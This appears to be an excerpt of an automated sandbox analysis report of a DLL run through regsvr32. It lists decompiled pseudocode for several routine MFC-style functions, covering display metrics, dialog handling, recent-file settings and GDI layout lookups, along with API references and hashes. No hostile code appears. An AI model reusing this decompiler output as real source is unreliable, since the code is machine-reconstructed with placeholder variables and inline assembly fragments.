                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _swprintf$H_prolog3_LongWindow__vsprintf_s_l_strlen
                                                                                                                • String ID: - $:%d
                                                                                                                • API String ID: 1012054303-2359489159
                                                                                                                • Opcode ID: 63244a309c4e1ce2be867d77882b35079c284ff71caf3314a712287f9dfc3e77
                                                                                                                • Instruction ID: fd64e6a11f349006b99ad3e3af546d366868ae2af92203d1d57b90f4a38e4adb
                                                                                                                • Opcode Fuzzy Hash: 63244a309c4e1ce2be867d77882b35079c284ff71caf3314a712287f9dfc3e77
                                                                                                                • Instruction Fuzzy Hash: 6E21AF7A801208AAE721EBA0ED56EFF73B9FF14341F500529B516A7195EF30BE08CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10011243 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E10011243(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(L10010FF9() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E1004BFF9(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x100bda28(_a4, _a8);
			}








                                                                                                                0x10011250
                                                                                                                0x10011269
                                                                                                                0x100112d4
                                                                                                                0x100112d4
                                                                                                                0x100112d6
                                                                                                                0x00000000
                                                                                                                0x100112d7
                                                                                                                0x1001126b
                                                                                                                0x10011272
                                                                                                                0x00000000
                                                                                                                0x1001128b
                                                                                                                0x1001128c
                                                                                                                0x1001128f
                                                                                                                0x1001129d
                                                                                                                0x100112a0
                                                                                                                0x100112a8
                                                                                                                0x100112a9
                                                                                                                0x100112aa
                                                                                                                0x100112ab
                                                                                                                0x100112b2
                                                                                                                0x100112b5
                                                                                                                0x100112b9
                                                                                                                0x100112c8
                                                                                                                0x100112cd
                                                                                                                0x100112d0
                                                                                                                0x00000000
                                                                                                                0x100112d0
                                                                                                                0x10011272
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10011281
                                                                                                                • GetSystemMetrics.USER32 ref: 10011299
                                                                                                                • GetSystemMetrics.USER32 ref: 100112A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$Metrics$InfoParameters
                                                                                                                • String ID: B$DISPLAY
                                                                                                                • API String ID: 3136151823-3316187204
                                                                                                                • Opcode ID: 8068e71f5c3a869b75398deb8be0d862eb1a0e925b55f4283e17b1e2f9b4c0f4
                                                                                                                • Instruction ID: 97ef3e79cf9e065ce80cb2f78251b648008c7c77418a083fa39792e940d8eb31
                                                                                                                • Opcode Fuzzy Hash: 8068e71f5c3a869b75398deb8be0d862eb1a0e925b55f4283e17b1e2f9b4c0f4
                                                                                                                • Instruction Fuzzy Hash: DE11A371A00325ABDF15DFA5DC84ADBBBA8EF06790B014061FD05EE446D2B1D890CBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001B7F6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001B7F6(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E10011BA4(__ecx, __eflags, _t26) == 0) {
					_t10 = E10014BA7(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E10012240(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E10021C2F(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}













                                                                                                                0x1001b7f6
                                                                                                                0x1001b7f6
                                                                                                                0x1001b7f8
                                                                                                                0x1001b7fd
                                                                                                                0x1001b806
                                                                                                                0x1001b80f
                                                                                                                0x1001b814
                                                                                                                0x1001b816
                                                                                                                0x1001b822
                                                                                                                0x1001b822
                                                                                                                0x1001b829
                                                                                                                0x1001b884
                                                                                                                0x00000000
                                                                                                                0x1001b887
                                                                                                                0x1001b82b
                                                                                                                0x1001b82e
                                                                                                                0x1001b831
                                                                                                                0x1001b838
                                                                                                                0x1001b842
                                                                                                                0x1001b844
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b84d
                                                                                                                0x1001b852
                                                                                                                0x1001b854
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b85b
                                                                                                                0x1001b861
                                                                                                                0x1001b863
                                                                                                                0x1001b870
                                                                                                                0x1001b87c
                                                                                                                0x00000000
                                                                                                                0x1001b87c
                                                                                                                0x1001b866
                                                                                                                0x1001b86c
                                                                                                                0x1001b86e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b86e
                                                                                                                0x1001b833
                                                                                                                0x1001b836
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b836
                                                                                                                0x1001b818
                                                                                                                0x1001b81c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b81e
                                                                                                                0x1001b808
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Edit
                                                                                                                • API String ID: 0-554135844
                                                                                                                • Opcode ID: a05c97695a32eb97e0a893a7320ccb4d8a6aa492ae763224ec430d27a9d8552c
                                                                                                                • Instruction ID: 07053561f4277099a3d04e1c325a2f95bcac334b9408a2c0d6db1208d980b8c9
                                                                                                                • Opcode Fuzzy Hash: a05c97695a32eb97e0a893a7320ccb4d8a6aa492ae763224ec430d27a9d8552c
                                                                                                                • Instruction Fuzzy Hash: 4201C035600A02ABEB14DA258C45B9AB2ECEF41FD5F514528F442DA0B0DF70ECD0C690
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100190D4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E100190D4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t32;
				void* _t33;

				_push(4);
				E1004764D(0x1008ecee, __ebx, __edi, __esi);
				_t32 = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				E10019074(__ecx, 0x20, _t33 - 0x10);
				if( *((intOrPtr*)(_t33 + 8)) != 0) {
					_t36 =  *((intOrPtr*)(_t33 - 0x10));
					if( *((intOrPtr*)(_t33 - 0x10)) == 0) {
						_t26 = E10009F14(_t36, 0x20);
						 *((intOrPtr*)(_t33 - 0x10)) = _t26;
						_t37 = _t26;
						 *(_t33 - 4) = 0;
						if(_t26 == 0) {
							_t20 = 0;
							__eflags = 0;
						} else {
							_push(0x1e);
							_push( *((intOrPtr*)(_t33 + 8)));
							_push("File%d");
							_push("Recent File List");
							_push(0);
							_t20 = E100269C0(__ebx, _t26, 0, _t32, _t37);
						}
						 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t32 + 0x88)) = _t20;
						 *((intOrPtr*)( *_t20 + 0x10))();
					}
				}
				 *((intOrPtr*)(_t32 + 0x94)) = E10025F92(_t32, "Settings", "PreviewPages", 0);
				return E10047725(_t17);
			}







                                                                                                                0x100190d4
                                                                                                                0x100190db
                                                                                                                0x100190e0
                                                                                                                0x100190ea
                                                                                                                0x100190ed
                                                                                                                0x100190f5
                                                                                                                0x100190f7
                                                                                                                0x100190fa
                                                                                                                0x10019104
                                                                                                                0x10019106
                                                                                                                0x10019109
                                                                                                                0x1001910b
                                                                                                                0x1001910e
                                                                                                                0x10019127
                                                                                                                0x10019127
                                                                                                                0x10019110
                                                                                                                0x10019110
                                                                                                                0x10019112
                                                                                                                0x10019115
                                                                                                                0x1001911a
                                                                                                                0x1001911f
                                                                                                                0x10019120
                                                                                                                0x10019120
                                                                                                                0x10019129
                                                                                                                0x1001912d
                                                                                                                0x10019137
                                                                                                                0x10019137
                                                                                                                0x100190fa
                                                                                                                0x1001914c
                                                                                                                0x10019157

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100190DB
                                                                                                                  • Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E
                                                                                                                  • Part of subcall function 100269C0: __EH_prolog3.LIBCMT ref: 100269C7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$_malloc
                                                                                                                • String ID: File%d$PreviewPages$Recent File List$Settings
                                                                                                                • API String ID: 1683881009-526586445
                                                                                                                • Opcode ID: 102062f58e8eb2ce84fc7bcee302e76a552dd2902e429c62ac920ed42ba2649f
                                                                                                                • Instruction ID: e2bdf456994b232c3ec09ff3447ed3ecde582c8e3873aa901323e6cb6196a485
                                                                                                                • Opcode Fuzzy Hash: 102062f58e8eb2ce84fc7bcee302e76a552dd2902e429c62ac920ed42ba2649f
                                                                                                                • Instruction Fuzzy Hash: 6C01A235E4060ABBCB15DFB48C15EBE76B1FF84750F20852EF2699B181DB7095809751
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000C193 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E1000C193(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}







                                                                                                                0x1000c19a
                                                                                                                0x1000c19c
                                                                                                                0x1000c1a8
                                                                                                                0x1000c1aa
                                                                                                                0x1000c1b2
                                                                                                                0x1000c1c5
                                                                                                                0x1000c1c9
                                                                                                                0x1000c1cc
                                                                                                                0x1000c1cc
                                                                                                                0x1000c1b4
                                                                                                                0x1000c1bd
                                                                                                                0x1000c1bd
                                                                                                                0x1000c1d6

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,1004444D,00000000), ref: 1000C19C
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetLayout,?,?,1004444D,00000000), ref: 1000C1AA
                                                                                                                • SetLastError.KERNEL32(00000078,?,?,1004444D,00000000), ref: 1000C1CC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorHandleLastModuleProc
                                                                                                                • String ID: GDI32.DLL$SetLayout
                                                                                                                • API String ID: 4275029093-2147214759
                                                                                                                • Opcode ID: 4e63dc2d4395020bca6b567e20ec15d9c3cf4b3b9062aa123a5f3a41c6494be1
                                                                                                                • Instruction ID: 94626ab8e3bfee5670fa724d826468d4054a6831626c432c528c060394332660
                                                                                                                • Opcode Fuzzy Hash: 4e63dc2d4395020bca6b567e20ec15d9c3cf4b3b9062aa123a5f3a41c6494be1
                                                                                                                • Instruction Fuzzy Hash: C0E020331402107BE650971A4D88CCE3B93DBC3371B598615FB39C10A4C7398C559B20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000C15D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E1000C15D(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}






                                                                                                                0x1000c163
                                                                                                                0x1000c171
                                                                                                                0x1000c179
                                                                                                                0x1000c186
                                                                                                                0x1000c189
                                                                                                                0x1000c17b
                                                                                                                0x1000c180
                                                                                                                0x1000c180
                                                                                                                0x1000c192

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(GDI32.DLL,?,10044440), ref: 1000C165
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 1000C171
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1000C189
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorHandleLastModuleProc
                                                                                                                • String ID: GDI32.DLL$GetLayout
                                                                                                                • API String ID: 4275029093-2396518106
                                                                                                                • Opcode ID: 62a36cdf378d546a2627890dc174a3fe51776cdb57757038142c1d02188e673e
                                                                                                                • Instruction ID: 0ec2beb3e0e8ea4de9f101b9fc61ac14c10b2d7aa20409389975f5a3b332688b
                                                                                                                • Opcode Fuzzy Hash: 62a36cdf378d546a2627890dc174a3fe51776cdb57757038142c1d02188e673e
                                                                                                                • Instruction Fuzzy Hash: E6D05B315042316BE65067B55F4CDC63B54DB476A17490750FE39E21E4CF29CC4557D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003D5A7 Relevance: 7.7, APIs: 5, Instructions: 214windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E1003D5A7(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed char _t81;
				signed int _t86;
				signed int _t91;
				signed int _t93;
				signed int _t101;
				signed int _t117;
				intOrPtr _t131;
				void* _t132;
				intOrPtr _t139;
				void* _t153;
				signed int _t157;
				void* _t158;
				intOrPtr _t161;
				void* _t162;
				signed int _t164;
				void* _t166;

				_t153 = __edx;
				_t133 = __ecx;
				_t164 = _t166 - 0xb8;
				_t73 =  *0x100b9e70; // 0xbb35530
				 *(_t164 + 0xb4) = _t73 ^ _t164;
				_t161 =  *((intOrPtr*)(_t164 + 0xc0));
				_t131 = __ecx;
				_t170 = __ecx;
				 *((intOrPtr*)(_t164 - 0x58)) = _t161;
				 *(_t164 - 0x54) =  *(_t164 + 0xc4);
				if(__ecx == 0) {
					L1:
					E1000A069(_t131, _t133, 0, _t161, _t170);
				}
				if(_t161 == 0) {
					goto L1;
				}
				_t78 = GetWindowRect( *(_t161 + 0x20), _t164 - 0x80);
				if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 ||  *(_t164 - 0x54) != 0 && EqualRect(_t164 - 0x80,  *(_t164 - 0x54)) == 0) {
					if( *((intOrPtr*)(_t131 + 0x94)) != 0 && ( *(_t161 + 0x84) & 0x00000040) != 0) {
						 *(_t131 + 0x80) =  *(_t131 + 0x80) | 0x00000040;
					}
					 *(_t131 + 0x80) =  *(_t131 + 0x80) & 0xfffffff9;
					_t81 =  *(_t161 + 0x80) & 0x00000006 |  *(_t131 + 0x80);
					_t178 = _t81 & 0x00000040;
					 *(_t131 + 0x80) = _t81;
					if((_t81 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t164 - 0x50);
						E10018055(_t131, _t161, 0, _t161, _t178);
						E100219F5(_t161, _t153,  *((intOrPtr*)(_t131 + 0x20)), _t164 - 0x50);
					}
					_t86 = ( *(_t161 + 0x80) ^  *(_t131 + 0x80)) & 0x0000f000 ^  *(_t161 + 0x80) | 0x00000f00;
					if( *((intOrPtr*)(_t131 + 0x94)) == 0) {
						_t87 = _t86 & 0xfffffffe;
						__eflags = _t86 & 0xfffffffe;
					} else {
						_t87 = _t86 | 0x00000001;
					}
					E10042892(_t161, _t87);
					 *((intOrPtr*)(_t164 - 0x6c)) = 0;
					if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 && IsWindowVisible( *(_t161 + 0x20)) != 0) {
						E10017C59(_t161, 0, 0, 0, 0, 0, 0x97);
						 *((intOrPtr*)(_t164 - 0x6c)) = 1;
					}
					 *(_t164 - 0x70) =  *(_t164 - 0x70) | 0xffffffff;
					if( *(_t164 - 0x54) == 0) {
						_t60 = _t131 + 0x98; // 0x98
						_t156 = _t60;
						E100420F2(_t131, _t60, _t164,  *((intOrPtr*)(_t60 + 8)), _t161);
						E100420F2(_t131, _t156, _t164,  *((intOrPtr*)(_t156 + 8)), 0);
						_t91 =  *0x100bdc8c; // 0x2
						_t157 = 0;
						__eflags = 0;
						_t93 =  *0x100bdc88; // 0x2
						_t138 = _t161;
						E10017C59(_t161, 0,  ~_t93,  ~_t91, 0, 0, 0x115);
					} else {
						CopyRect(_t164 - 0x68,  *(_t164 - 0x54));
						E1000C8F5(_t131, _t164 - 0x68);
						asm("cdq");
						asm("cdq");
						_push(( *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)) - _t153 >> 1) +  *((intOrPtr*)(_t164 - 0x64)));
						_push(( *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68) - _t153 >> 1) +  *(_t164 - 0x68));
						_push( *((intOrPtr*)(_t164 - 0x58)));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t117 = E1003CABE(_t131);
						_t138 =  *((intOrPtr*)(_t164 - 0x58));
						 *(_t164 - 0x70) = _t117;
						E10017C59( *((intOrPtr*)(_t164 - 0x58)), 0,  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x64)),  *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)), 0x114);
						_t161 =  *((intOrPtr*)(_t164 - 0x58));
						_t157 = 0;
					}
					if(E10013FEA(_t131, _t138, _t164, GetParent( *(_t161 + 0x20))) != _t131) {
						E1003C8A7(_t161, _t131);
					}
					_t139 =  *((intOrPtr*)(_t161 + 0x8c));
					if(_t139 != _t131) {
						__eflags = _t139 - _t157;
						if(_t139 != _t157) {
							__eflags =  *((intOrPtr*)(_t131 + 0x94)) - _t157;
							if( *((intOrPtr*)(_t131 + 0x94)) == _t157) {
								L28:
								_t101 = 0;
								__eflags = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t139 + 0x94)) - _t157;
								if( *((intOrPtr*)(_t139 + 0x94)) != _t157) {
									goto L28;
								} else {
									_t101 = 1;
								}
							}
							_push(_t101);
							_push(0xffffffff);
							goto L30;
						}
					} else {
						_push(_t157);
						_push( *(_t164 - 0x70));
						L30:
						_push(_t161);
						L1003CE7C(_t139, _t157);
					}
					 *((intOrPtr*)(_t161 + 0x8c)) = _t131;
					if( *((intOrPtr*)(_t164 - 0x6c)) != _t157) {
						E10017C59(_t161, _t157, _t157, _t157, _t157, _t157, 0x57);
					}
					L1003CE15(_t131, _t131, _t164, _t161);
					 *(L10034F71(_t131) + 0xd0) =  *(_t78 + 0xd0) | 0x0000000c;
				}
				_pop(_t158);
				_pop(_t162);
				_pop(_t132);
				return E1004763E(_t78, _t132,  *(_t164 + 0xb4) ^ _t164, _t153, _t158, _t162);
			}
























                                                                                                                0x1003d5a7
                                                                                                                0x1003d5a7
                                                                                                                0x1003d5a8
                                                                                                                0x1003d5b5
                                                                                                                0x1003d5bc
                                                                                                                0x1003d5ca
                                                                                                                0x1003d5d1
                                                                                                                0x1003d5d5
